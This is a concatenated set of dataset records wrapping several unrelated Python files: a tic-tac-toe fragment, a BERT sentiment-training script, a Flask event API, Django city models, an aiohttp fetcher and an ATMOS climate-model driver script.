exitlist.append(1)\n elif list1[0][1] == char and list1[1][1] == char and list1[2][1] == char:\n Win(p)\n exitlist.append(1)\n elif list1[0][2] == char and list1[1][2] == char and list1[2][2] == char:\n Win(p)\n exitlist.append(1)\n #\n elif list1[0][0] == char and list1[1][1] == char and list1[2][2] == char:\n Win(p)\n exitlist.append(1)\n elif list1[0][2] == char and list1[1][1] == char and list1[2][0] == char:\n Win(p)\n exitlist.append(1)\n\ndef Game(): \n while len(exitlist) == 0:\n if len(exitlist) == 0:\n round += 1\n Player1()\n else:\n break\n\n if len(exitlist) == 0:\n round += 1\n Player2()\n else:\n break\n\nGame()\n\nnextgame\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"143949061","text":"import os\n\nimport pytreebank\nimport torch\nimport torch.optim as optim\nfrom loguru import logger\nfrom pytorch_transformers import (\n BertConfig,\n BertForSequenceClassification,\n BertTokenizer,\n)\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nos.environ[\"CUDA_LAUNCH_BLOCKING\"] = \"1\"\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nlogger.info(\"Loading the tokenizer\")\ntokenizer = BertTokenizer.from_pretrained(\"bert-large-uncased\")\n\nlogger.info(\"Loading SST\")\nsst = pytreebank.load_sst()\n\n\ndef rpad(array, n=70):\n \"\"\"Right padding.\"\"\"\n current_len = len(array)\n if current_len > n:\n return array[: n - 1]\n extra = n - current_len\n return array + ([0] * extra)\n\n\ndef get_binary_label(label):\n \"\"\"Convert fine-grained label to binary label.\"\"\"\n if label < 2:\n return 0\n if label > 2:\n return 1\n raise ValueError(\"Invalid label\")\n\n\nclass SSTDataset(data.Dataset):\n def __init__(self, split=\"train\", root=True, binary=True):\n logger.info(f\"Loading SST {split} set\")\n self.sst = sst[split]\n\n logger.info(\"Tokenizing\")\n if root and binary:\n self.data = [\n (\n rpad(\n tokenizer.encode(\"[CLS] \" + tree.to_lines()[0] + \" [SEP]\"), n=66\n ),\n get_binary_label(tree.label),\n )\n for tree in self.sst\n if tree.label != 2\n ]\n elif root and not binary:\n self.data = [\n (\n rpad(\n tokenizer.encode(\"[CLS] \" + tree.to_lines()[0] + \" [SEP]\"), n=66\n ),\n tree.label,\n )\n for tree in self.sst\n ]\n elif not root and not binary:\n self.data = [\n (rpad(tokenizer.encode(\"[CLS] \" + line + \" [SEP]\"), n=66), label)\n for tree in self.sst\n for label, line in tree.to_labeled_lines()\n ]\n else:\n self.data = [\n (\n rpad(tokenizer.encode(\"[CLS] \" + line + \" [SEP]\"), n=66),\n get_binary_label(label),\n )\n for tree in self.sst\n for label, line in tree.to_labeled_lines()\n if label != 2\n ]\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n X, y = self.data[index]\n X = torch.tensor(X)\n return X, y\n\n\ndef train(model, dataset, batch_size=32):\n generator = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True\n )\n model.train()\n train_loss, train_acc = 0.0, 0.0\n for batch, labels in tqdm(generator):\n batch, labels = batch.to(device), labels.to(device)\n optimizer.zero_grad()\n loss, logits = model(batch, labels=labels)\n err = lossfn(logits, labels)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n pred_labels = torch.argmax(logits, axis=1)\n train_acc += (pred_labels == labels).sum().item()\n train_loss /= len(dataset)\n train_acc /= len(dataset)\n return train_loss, train_acc\n\n\ndef evaluate(model, dataset, batch_size=32):\n generator = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True\n )\n # validation\n model.eval()\n loss, acc = 0.0, 0.0\n with torch.no_grad():\n for batch, labels in tqdm(generator):\n batch, labels = batch.to(device), labels.to(device)\n logits = model(batch)[0]\n error = lossfn(logits, labels)\n loss += error.item()\n pred_labels = torch.argmax(logits, axis=1)\n acc += (pred_labels == labels).sum().item()\n loss /= len(dataset)\n acc /= len(dataset)\n return loss, acc\n\n\nif __name__ == \"__main__\":\n trainset = SSTDataset(\"train\", root=False, binary=False)\n devset = SSTDataset(\"dev\", root=False, binary=False)\n testset = SSTDataset(\"test\", root=False, binary=False)\n\n config = BertConfig.from_pretrained(\"bert-large-uncased\")\n config.num_labels = 5\n model = BertForSequenceClassification.from_pretrained(\n \"bert-large-uncased\", config=config\n )\n # model = BertForSequenceClassification.from_pretrained('bert-large-uncased')\n model = model.to(device)\n lossfn = torch.nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=1e-5)\n\n for epoch in range(1, 30):\n train_loss, train_acc = train(model, trainset, batch_size=32)\n val_loss, val_acc = evaluate(model, devset, batch_size=32)\n test_loss, test_acc = evaluate(model, testset, batch_size=32)\n logger.info(\n f\"{epoch}, {train_loss:.4f}, {val_loss:.4f}, {test_loss:.4f}, \"\n f\"{train_acc:.3f}, {val_acc:.3f}, {test_acc:.3f}\"\n )\n torch.save(model, f\"bert_large_all_fine_e{epoch}.pickle\")\n\n logger.success(\"Done!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191929978","text":"from flask import Flask, request, jsonify\nfrom bson import ObjectId\nimport requests as req\nimport socket \nimport db\nimport time \nimport random\nimport json\n\napp = Flask(__name__)\n\ndbase = db.Db()\n\n# testing ipaddresses \n# ipaddresses = [\n# '12.87.118.0',\n# '64.17.254.216',\n# '65.23.121.221',\n# '67.43.156.0',\n# '67.43.156.64',\n# '78.26.70.208',\n# '81.2.69.160',\n# '82.99.17.96',\n# '83.206.36.224',\n# '85.88.2.224',\n# '89.160.20.112',\n# '142.217.214.0',\n# '222.230.136.0'\n# ]\n\n\nERROR_REQ_FORMAT = 'Please check your data request format.\\n'\nERROR_REQ_FORMAT += ' city=[cityname]&st=[starttime]&et=[endtime]\\n'\nERROR_REQ_FORMAT += ' time format : \\\"%Y-%m-%d:%H.%M.%S\\\" \\n'\nERROR_REQ_FORMAT += ' for example : curl \\'http://ec2-34-201-52-248.compute-1.amazonaws.com:5000?city=Stockholm&st=2019-1-17:09.01.00&et=2019-1-17:09.02.30\\'\\n'\n\n\ndef getlocation(geoservice=None, ipaddress=None):\n '''fetch the remote host location\n '''\n url='http://'+geoservice+':8080/info?ip='+ipaddress\n r = req.get(url)\n jsonstr=r.text\n locdict = json.loads(jsonstr)\n\n if r.status_code == 429:\n timetosleep = float(locdict['period_remaining'])\n time.sleep(timetosleep)\n getlocation(geoservice, ipaddress)\n\n\n result=str()\n try:\n result=locdict['city']\n except:\n result='N/A'\n\n return result\n\ndef gethostname(ipaddress=None):\n '''use the socket to try and get the remote hostname\n '''\n try: \n host_name = socket.gethostbyaddr(ipaddress) \n except: \n host_name = 'n/a'\n\n return host_name[0]\n\n@app.route('/findevent', methods=['GET'])\ndef findevent():\n '''create a query for city & timerange \n '''\n result=str()\n if request.method == 'GET':\n if 'city' in request.args and 'st' in request.args and 'et' in request.args:\n cityname = str(request.args.get('city')).upper()\n time_start=request.args.get('st')\n time_end=request.args.get('et')\n else:\n return 'Bad Request', 400\n\n data = dbase.get(cityname, time_start, time_end)\n\n if data[:10]=='ValueError':\n result = 'Bad Request', 400\n\n elif data[:10]=='queryError':\n result = 'Not Found', 404\n\n else:\n result = data, 200\n\n\n else:\n\n result = 'Bad Request', 400\n\n\n return result\n\n\n@app.route('/event', methods=['POST'])\ndef event():\n '''write the JSON paylaod to the db \n '''\n\n geoservice = 'geoipapi'\n # geoservice = '127.0.0.1' # DEBUG \n\n try:\n jsonpayload = request.get_json(force=True)\n\n except:\n return 'input data has to be in JSON-format', 400\n\n remoteaddr = request.remote_addr\n # remoteaddr = ipaddresses[random.randint(0,len(ipaddresses)-1)] # DEBUG\n remotehost = gethostname(remoteaddr)\n\n if len(remotehost)<3:\n remotehost='N/A'\n \n result = '', 400\n \n location=getlocation(geoservice, remoteaddr)\n \n if len(location)<4 or location=='N/A':\n result ='JSON payload saved but cannot fetch the location for this ip : {}'.format(remoteaddr), 200\n \n written = dbase.set(remoteaddr, remotehost, location, jsonpayload)\n \n if written:\n result = 'Ok', 200\n \n return result\n\n \n\n\n\n@app.route('/')\ndef index():\n return 'you\\'ve reached my events application!'\n\n\nif __name__ == '__main__':\n app.run(debug=False,host='0.0.0.0')\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"641933786","text":"# -*- encoding: utf-8 -*-\nfrom django.db import models\n\nclass Country(models.Model):\n name = models.CharField('Название',\n max_length=150,\n )\n\n show = models.BooleanField('Показывать на сайте',\n default=True, )\n\n order = models.IntegerField('Порядок',\n default=0)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Страна'\n verbose_name_plural = 'Страны'\n ordering = ['order', 'name']\n\nclass City(models.Model):\n name = models.CharField('Город',\n max_length=150,\n unique=True,\n )\n slug = models.CharField('Ссылка',\n max_length=150,\n null = True,\n blank = True)\n syn = models.ForeignKey('self',\n blank = True,\n null = True,\n verbose_name = 'Синоним',\n related_name = 'synonyms',\n )\n country = models.ForeignKey(Country,\n related_name = 'cities',\n null=True,\n blank=True)\n\n show = models.BooleanField('Показывать на сайте',\n default = True,)\n order = models.IntegerField('Порядок',\n default = 0)\n added = models.DateTimeField('Добавлен',\n auto_now_add = True)\n changed = models.DateTimeField('Изменен',\n auto_now = True)\n\n def __str__(self):\n return self.name\n\n def save(self):\n if not self.slug:\n self.slug = save_for_url(self.name)\n return super(City, self).save()\n\n def get_absolute_url(self):\n return self.slug\n\n class Meta:\n verbose_name = 'Город'\n verbose_name_plural = 'Города'\n ordering = ['order', 'name']\n\ndef to_translit(str):\n \"\"\"\n Переводит русские буквы в транслит\n \"\"\"\n ar = {u'А':'A',u'Б':'B',u'В':'V',u'Г':'G',u'Д':'D',u'Е':'E',u'Ё':'E',u'Ж':'J',u'З':'Z',u'И':'I',u'Й':'Y',u'К':'K',u'Л':'L',u'М':'M',u'Н':'N',u'О':'O',u'П':'P',u'Р':'R',u'С':'S',u'Т':'T',u'У':'U',u'Ф':'F',u'Х':'H',u'Ц':'C',u'Ч':'CH',u'Ш':'SH',u'Щ':'SHCH',u'Ы':'Y',u'Э':'E',u'Ю':'YU',u'Я':'YA',u'а':'a',u'б':'b',u'в':'v',u'г':'g',u'д':'d',u'е':'e',u'ё':'e',u'ж':'j',u'з':'z',u'и':'i',u'й':'y',u'к':'k',u'л':'l',u'м':'m',u'н':'n',u'о':'o',u'п':'p',u'р':'r',u'с':'s',u'т':'t',u'у':'u',u'ф':'f',u'х':'h',u'ц':'c',u'ч':'ch',u'ш':'sh',u'щ':'shch',u'ы':'y',u'э':'e',u'ю':'yu',u'я':'ya',u'Ъ':'',u'ъ':'',u'Ь':'',u'ь':''}\n translitstr = ''\n for l in u'%s'%str:\n try:\n translitstr = translitstr + ar[l]\n except KeyError:\n translitstr = translitstr + l\n return translitstr\n\ndef save_for_url(str):\n \"\"\"\n В полученой строке срезается HTML и все \\W меняются на подчеркивание\n \"\"\"\n import re\n r = re.compile('\\W')\n return re.sub('\\W','_',to_translit(re.sub('<[^>]*?>','',str)))","sub_path":"eventakte/city/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476074777","text":"def main():\n read = set()\n with open('./program.txt', mode='r') as f:\n for line in f:\n line = line.replace('\\n', '')\n if len(line) < 20:\n continue\n if line in read:\n continue\n for l in read:\n if diff(l, line) < 5:\n print('=============')\n print(l)\n print(line)\n print('=============')\n read.add(line)\n\n\ndef diff(s1, s2):\n count = 0\n if len(s1) < len(s2):\n s1 = s1 + \" \" * (len(s2) - len(s1))\n elif len(s1) > len(s2):\n s2 = s2 + \" \" * (len(s1) - len(s2))\n for i in range(len(s1)):\n if s1[i] != s2[i]:\n count += 1\n return count\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2015_summer/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"187557317","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 16 10:42:11 2020\n\n@author: alisha\n\"\"\"\nimport pandas as pd\n\n\ndef mean(data1, data2, ids):\n \n ''' calculate the mean and std of 2 dfs'''\n \n #calculate mean & std of both rounds \n df_concat = pd.concat((data1, data2))\n by_row_index = df_concat.groupby(df_concat.index)\n df_means = by_row_index.mean()\n df_means['sub_id']= ids\n df_std = by_row_index.std()\n df_std['sub_id']= ids\n \n return df_means, df_std\n \n \ndef mean_diff(sep_1_imm, sep_1_del, sep_2_imm, sep_2_del):\n \n ids = sep_1_del.loc[:,'sub_id']\n \n #calculate difference between immediate and delayed answers\n diff1 = sep_1_del - sep_1_imm\n diff2 = sep_2_del - sep_2_imm\n #add ids\n diff1['sub_id'] = ids\n diff2['sub_id'] = ids\n \n #calculate mean and std of diff1 and diff2\n df_diff_mean, df_diff_std = mean(diff1,diff2, ids)\n \n #calculate mean of immediate and delayed responses\n df_imm_mean, df_imm_std = mean(sep_1_imm,sep_2_imm, ids)\n df_del_mean, df_del_std = mean(sep_1_del,sep_2_del, ids)\n \n \n return df_diff_mean, df_diff_std, df_imm_mean, df_imm_std, df_del_mean, df_del_std, diff1, diff2","sub_path":"rr_mean_diff.py","file_name":"rr_mean_diff.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"165407406","text":"import unittest\nimport context\nimport os\n\nfrom pyrview.config import Config\n\npath = os.path.dirname(os.path.realpath(__file__));\n\nclass LoadConfig(unittest.TestCase):\n\n def setUp(self):\n self.config = Config(path + \"/etc/config.yaml\")\n self.document = self.config.document\n\n def test_document(self):\n self.assertTrue(self.document)\n self.assertIsInstance(self.document, dict, \"document is dict type\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"123878649","text":"from meu_grafo import MeuGrafo\n\nparaiba = MeuGrafo(['J', 'C', 'E', 'P', 'M', 'T', 'Z'])\nparaiba.adicionaAresta('a1', 'J', 'C')\nparaiba.adicionaAresta('a2', 'C', 'E')\nparaiba.adicionaAresta('a3', 'C', 'E')\nparaiba.adicionaAresta('a4', 'P', 'C')\nparaiba.adicionaAresta('a5', 'P', 'C')\nparaiba.adicionaAresta('a6', 'M', 'C')\nparaiba.adicionaAresta('a7', 'T', 'C')\nparaiba.adicionaAresta('a8', 'M', 'T')\nparaiba.adicionaAresta('a9', 'T', 'Z')\ndef separador():\n print(\"-\"*159)\n\nprint(\"\\nNós...\", paraiba.N)\nseparador()\n\nprint(\"Arestas...\")\nfor a in paraiba.A:\n print(paraiba.A[a])\nseparador()\n\nif paraiba.ha_laco():\n print(\"Há laços no grafo\")\nelse:\n print(\"Não há laços nesse grafo\")\nseparador()\n\nif paraiba.ha_paralelas():\n print(\"Há retas paralelas\")\nelse:\n print(\"Não há retas paralelas\")\nseparador()\n\nfor n in paraiba.N:\n print(f\"Grau do vértice {n} -> {paraiba.grau(n)}\")\nseparador()\n\nfor n in paraiba.N:\n print(f\"Arestas sobre o vértice {n}: {paraiba.arestas_sobre_vertice(n)}\")\nseparador()\n\nprint(f\"Lista de vértices não adjacentes: {paraiba.vertices_nao_adjacentes()}\")\nseparador()\n\nif paraiba.eh_completo():\n print(\"O grafo é completo\")\nelse: \n print(\"O grafo não é completo\")\nseparador()\n\nprint(\"BFS no grafo da paraiba (começando no vértice J)\")\nprint(paraiba.BFS(\"J\"))\nseparador()\n\nprint(\"DFS no grafo da paraiba (começando no vértice J)\")\nprint(paraiba.DFS('J'))\nseparador()\n\nif paraiba.ha_ciclo():\n print(f\"Ciclo presente no grafo da paraiba: {paraiba.ha_ciclo()}\")\nelse:\n print(\"Não há ciclo no grafo da paraiba\")\nseparador()\n\nfor c in range(6):\n if paraiba.caminho(c):\n print(f\"Caminho de tamanho {c} no grafo da paraiba: {paraiba.caminho(c)}\")\n else:\n print(f\"Não há um caminho de tamanho {c}\")\nseparador()\n\nif paraiba.conexo():\n print(\"O grafo da paraiba é conexo\")\nelse:\n print(\"O grafo da paraiba não é conexo\")\nseparador()","sub_path":"roteiro_3/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"218836636","text":"import asyncio\n\nimport aiohttp\n# import aiofiles\n\n# f = aiofiles.open()\n\n#aiofiles.open('filename', mode='r') as f:\n\nfile = open('/home/andrei/Python/sqlalchemy-lab/receipt/catalog.txt', 'r')\n\n# def get_next_file_line():\n# yield from loop.run_in_executor(None, file.readline)\n\nasync def get_next_file_line():\n return await loop.run_in_executor(None, file.readline)\n\nasync def foo():\n print('Running in foo')\n await asyncio.sleep(0)\n print('Explicit context switch to foo again')\n\n\nasync def parse_web_page(url, session):\n l = await get_next_file_line()\n print('parse_web_page', url, l)\n async with session.get(url, timeout=60) as response:\n res = await response.text()\n print('parse_web_page', url, 'got', len(res))\n return len(res)\n\n\nasync def fetch_all_urls(session, urls, loop):\n return await asyncio.gather(*[parse_web_page(url, session) for url in urls], return_exceptions=True)\n\n\nurls = [\n 'https://povar.ru/recipes/manty_po-uzbekski-18397.html',\n 'https://povar.ru/recipes/litovskie_ceppeliny-8617.html',\n 'https://povar.ru/recipes/podliv_iz_svininy-7633.html',\n]\n\nloop = asyncio.get_event_loop()\nconnector = aiohttp.TCPConnector(limit=100)\nsession = aiohttp.ClientSession(loop=loop, connector=connector)\nhtmls = loop.run_until_complete(fetch_all_urls(session, urls, loop))\nloop.run_until_complete(session.close())\nloop.close()\nfile.close()\n\nprint(htmls)","sub_path":"asyncio_/simple_read_urls.py","file_name":"simple_read_urls.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400933373","text":"import subprocess\r\nimport os\r\nimport sys\r\nimport re\r\n\r\nRESULT_DIR = \"atmos_runs_output/\"\r\nLOG_FILE = \"\" #set below\r\nRESULT_FILE = \"\" #set below\r\n\r\nATMOS_DIR = \"../../atmos/\"\r\n\r\nPHOTO_IN = ATMOS_DIR + \"PHOTOCHEM/INPUTFILES/\"\r\nPHOTO_PLANET_INPUT = PHOTO_IN + \"PLANET.dat\"\r\nPHOTO_SPECIES_INPUT = PHOTO_IN + \"species.dat\"\r\nPHOTO_GENERAL_INPUT = PHOTO_IN + \"input_photchem.dat\"\r\nPHOTO_OUTFILE = ATMOS_DIR + \"PHOTOCHEM/OUTPUT/out.out\"\r\n\r\nCLIMA_IO = ATMOS_DIR + \"CLIMA/IO/\"\r\nCLIMA_OUTPUT_FILE = CLIMA_IO + \"clima_allout.tab\"\r\nCLIMA_TEMP_OUT = CLIMA_IO + \"TempOut.dat\"\r\nCLIMA_TEMP_IN = CLIMA_IO + \"TempIn.dat\"\r\n\r\nCH4 = 0\r\nCO2 = 0\r\nSOLCON = 1\r\nINPUT_TEMP_FILE = \"\"\r\nCONTINUE_RUN = False\r\n\r\ndef handleClimaOutput():\r\n \"\"\"\r\n Handle the output from the Clima model file.\r\n \"\"\"\r\n results_file = open(CLIMA_OUTPUT_FILE)\r\n val = \"DIVFrms=\" + os.popen(\"tac %s | grep -m 1 -oP 'NST=.*DIVFrms=\\K.*$'\"%(CLIMA_OUTPUT_FILE)).read()\r\n\r\n #the photochemical model didn't converge, note that in the error file\r\n #and stop\r\n log_file = open(LOG_FILE, \"a+\")\r\n log_file.write(\"Clima had: %s\\n\"%(val))\r\n log_file.close()\r\n\r\n #copy the output file\r\n os.system(\"cp %s %s/clima_allout.tab\"%(CLIMA_OUTPUT_FILE, RESULT_DIR))\r\n\r\n #copy the TempOut file and move it to the TempIn file\r\n os.system(\"cp %s %s/TempOut.dat\"%(CLIMA_TEMP_OUT, RESULT_DIR))\r\n os.system(\"cp %s %s\"%(CLIMA_TEMP_OUT, CLIMA_TEMP_IN))\r\n\r\n temp = float(re.search(\"T\\(ND\\)=([\\d].[\\d]+E[+-][\\d]+)\", val).group(1))\r\n return temp\r\n\r\n\r\ndef handlePhotoOutput():\r\n \"\"\"\r\n Read the out.out file from the PhotoChem model and check the EMAX term\r\n \"\"\"\r\n\r\n results_file = open(PHOTO_OUTFILE)\r\n val = os.popen(\"tac %s | grep -m 1 -oP 'EMAX = \\K[0-9.+-E]+'\"%(PHOTO_OUTFILE)).read()\r\n emax = float(val)\r\n\r\n #the photochemical model didn't converge, note that in the error file\r\n #and stop\r\n log_file = open(LOG_FILE, \"a+\")\r\n log_file.write(\"PhotoChem had EMAX = %2.2e\\n\"%(emax))\r\n log_file.close()\r\n\r\n #copy the output file\r\n os.system(\"cp %s %s/out.out\"%(PHOTO_OUTFILE, RESULT_DIR))\r\n\r\n if emax > 1.0E-10:\r\n #something went wrong, exit\r\n print(\"PhotoChem Failed to converge. See out.out file\")\r\n sys.exit()\r\n\r\ndef setPhotoCouple(val):\r\n \"\"\"\r\n Turn the photochemical model coupling on (if val==1) or off \r\n (if val==0)\r\n \"\"\"\r\n filename = \"new_file\"\r\n couple_str = \"ICOUPLE= %1d\\n\"%(val)\r\n input_file = open(PHOTO_GENERAL_INPUT)\r\n output_file = open(filename, \"wt\")\r\n for ind, line in enumerate(input_file):\r\n if ind==14:\r\n #this is the ICOUPLE line in input_photochem.dat\r\n line = couple_str\r\n output_file.write(line)\r\n planet_file.close()\r\n output_file.close()\r\n\r\n #UNIX complains that the operation isn't permitted if you try to copy here\r\n return filename\r\n\r\n################################Start the script################################\r\n\r\n#read the CH4 and CO2 from the command line\r\nif len(sys.argv) != 6:\r\n CH4 = float(input(\"Enter the CH4 mixing ratio as a fraction: \"))\r\n CO2 = float(input(\"Enter the CO2 mixing ratio as a fraction: \"))\r\n SOLCON = float(input(\"Enter the solar constant as a fraction of modern: \"))\r\n INPUT_TEMP_FILE = input(\"Enter the TempIn.dat file to use: \")\r\n CONTINUE_RUN = bool(int(input(\"Continue last run? [0=no, 1=yes]: \")))\r\nelse:\r\n CH4 = float(sys.argv[1])\r\n CO2 = float(sys.argv[2])\r\n SOLCON = float(sys.argv[3])\r\n INPUT_TEMP_FILE = sys.argv[4]\r\n CONTINUE_RUN = bool(int(sys.argv[5]))\r\n\r\n#configure the results directory\r\nRESULT_DIR += \"solcon_%0.2f/CO2_%2.1e_CH4_%2.1e/\"%(SOLCON, CO2, CH4)\r\nif not os.path.exists(RESULT_DIR):\r\n os.makedirs(RESULT_DIR)\r\n\r\n#set the log and result files\r\nLOG_FILE = RESULT_DIR + \"log.txt\"\r\nRESULT_FILE = RESULT_DIR + \"results.txt\"\r\n\r\n\r\n#format the CH4, CO2, and N2 amounts as strings\r\nCH4_AMT_STR = (\"%2.1e\"%(CH4)).upper()\r\nCO2_AMT_STR = (\"%2.1e\"%(CO2)).upper()\r\nN2 = 0.99 - CH4 - CO2\r\nN2_AMT_STR = (\"%2.1e\"%(N2)).upper()\r\n\r\n#set the TempIn file appropriately\r\nproc = subprocess.Popen([\"cp\", INPUT_TEMP_FILE, CLIMA_TEMP_IN])\r\nproc.wait()\r\n\r\n\r\n#1. set the input values for the solar constant in PLANET.dat \r\nplanet_file = open(PHOTO_PLANET_INPUT)\r\noutput_file = open(\"temp_out\", \"wt\")\r\nfor ind, line in enumerate(planet_file):\r\n if ind==1:\r\n #this is the solcon line in PLANET.dat\r\n new_solcon = \"%1.2f\"%(SOLCON)\r\n line = re.sub(r'^\\d\\.\\d\\d', new_solcon, line)\r\n output_file.write(line)\r\nplanet_file.close()\r\noutput_file.close()\r\nproc = subprocess.Popen([\"mv\", \"temp_out\", PHOTO_PLANET_INPUT])\r\nproc.wait()\r\n\r\n#turn off coupling, copy the modified file\r\nif not CONTINUE_RUN:\r\n name = setPhotoCouple(0)\r\n proc = subprocess.Popen([\"mv\", name, PHOTO_GENERAL_INPUT])\r\n proc.wait()\r\n\r\n#2. set CH4, CO2, and N2\r\nspecies_file = open(PHOTO_SPECIES_INPUT)\r\noutput_file = open(\"temp_out\", \"wt\")\r\nfor ind, line in enumerate(species_file):\r\n if ind==28:\r\n #this is the CH4 line in PLANET.dat\r\n line = \"CH4 LL 0 4 1 0 0 0 1 0. %s 0. 0. 0 0. 0. \\n\"%(CH4_AMT_STR)\r\n\r\n if ind==70:\r\n line = \"CO2 IN 2 0 1 0 0 0 %s \\n\"%(CO2_AMT_STR)\r\n\r\n if ind==71:\r\n line = \"N2 IN 0 0 0 0 2 0 %s \\n\"%(N2_AMT_STR)\r\n output_file.write(line)\r\nspecies_file.close()\r\noutput_file.close()\r\nproc = subprocess.Popen([\"mv\", \"temp_out\", PHOTO_SPECIES_INPUT])\r\nproc.wait()\r\n\r\n#3. run the Photo model uncoupled\r\nproc = subprocess.Popen([\"./Photo.run\"], cwd=ATMOS_DIR)\r\nproc.wait()\r\n\r\n#4. handle the PhotoChem output\r\nhandlePhotoOutput()\r\n \r\n#5. turn coupling back on for photochem\r\nname = setPhotoCouple(1)\r\nproc = subprocess.Popen([\"mv\", name, PHOTO_GENERAL_INPUT])\r\nproc.wait()\r\n\r\n#6. now loop over the climate model and photochem model until converged\r\nnum_runs = 5\r\nshould_cont = True\r\nlast_temp = 0\r\nwhile num_runs > 0 and should_cont:\r\n num_runs -= 1\r\n\r\n #run the climate model\r\n proc = subprocess.Popen([\"./Clima.run\"], cwd=ATMOS_DIR)\r\n proc.wait()\r\n\r\n #handle the clima output\r\n new_temp = handleClimaOutput()\r\n\r\n #check if it's stopped changing\r\n if abs(new_temp - last_temp) < 0.1:\r\n #temp is barely changing, let's call it good?\r\n should_cont = False\r\n else:\r\n #if this isn't the last time, run the photo again\r\n if num_runs > 0:\r\n #loop again! run the Photo model \r\n proc = subprocess.Popen([\"./Photo.run\"], cwd=ATMOS_DIR)\r\n proc.wait()\r\n\r\n #handle the PhotoChem output\r\n handlePhotoOutput()\r\n\r\n last_temp = new_temp\r\n\r\nif should_cont:\r\n #didn't converge in 5 loops\r\n print(\"Did not converge in max number of loops. Inspect this output.\")\r\nelse:\r\n print(\"Model appears to have converged!\")\r\n\r\n#save the final temp the the results file\r\nresults_file = open(RESULT_FILE, \"w+\")\r\nresults_file.write(\"Final temp was: %0.2f K for CO2=%2.3e, CH4=%2.3e, SOLCON=%0.2f\\n\"%(last_temp, CO2, CH4, SOLCON))\r\nresults_file.close()\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"atmos_data/run_atmos.py","file_name":"run_atmos.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310228068","text":"##Its a place to store your data -NoSQL --> mongodb\nfrom pymongo import MongoClient\n\nURI = \"mongodb://user01:linh99@ds229621.mlab.com:29621/c4e19-lab\"\n#1. Connect với db\nclient = MongoClient(URI)\n#2. Get database\ndb = client.get_default_database()\n#3. Tạo collection\ngames = db[\"Games\"]\nentertainment_links = db[\"Entertaining links\"]\n# #4. Tạo Documents\n# new_game = {\n# \"Name\":\"Cắt lông mũi\",\n# \"Describetion\":\"Funny game\",\n# \"Type\":\"Nhảm nhí\",\n \n# }\n# links = {\n# \"1\":\"Google.com\",\n# \"2\":\"tumblr.com\",\n# \"3\":\"Instagram.com\"\n# }\n# #5. Insert Doc into collection\n# games.insert_one(new_game)\n# entertainment_links.insert_one(links)\nall_games = games.find()\nprint(all_games[2][\"Name\"])\n","sub_path":"Labs/session6/Database_intro.py","file_name":"Database_intro.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"383170534","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nStardardPlateTargets.py\n\nCreated by José Sánchez-Gallego on 22 Oct 2015.\nLicensed under a 3-clause BSD license.\n\nRevision history:\n 22 Oct 2015 J. Sánchez-Gallego\n Initial version\n\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport os\n\nimport numpy as np\nfrom astropy import table\n\nfrom Gohan import log, readPath\nfrom Gohan.exceptions import GohanPlateTargetsError, GohanPlateTargetsWarning\nfrom Gohan.PlateTargets import PlateTargets, _toLowerCase\nfrom Gohan.utils import utils, yanny\n\n\nclass StandardPlateTargets(PlateTargets):\n\n def __init__(self, arg=None, **kwargs):\n \"\"\"A class to handle standard plateTargets files.\n\n Parameters\n ----------\n arg : string or None.\n The path to the plateTargets file to use. If None, the template\n will be used.\n\n \"\"\"\n\n self.template = False\n self._nAppended = 0\n self.catalogid = 'standard'\n\n if arg is not None:\n self.path = arg\n if not os.path.exists(self.path):\n raise GohanPlateTargetsError('path {0} cannot be found'\n .format(self.path))\n\n else:\n starPlateTargetsPath = os.path.join(\n os.path.dirname(utils.getPlateTargetsPath(1)),\n 'standardPlateTargets.par')\n\n if os.path.exists(starPlateTargetsPath):\n self.path = starPlateTargetsPath\n else:\n self.path = readPath(\n '+templates/standardPlateTargets.template')\n if self.path is None:\n raise GohanPlateTargetsError(\n 'neither the plateTargets nor the template '\n 'for catalogid={0} can be found'\n .format(self.catalogid))\n log.warning('using template for standardPlateTargets', 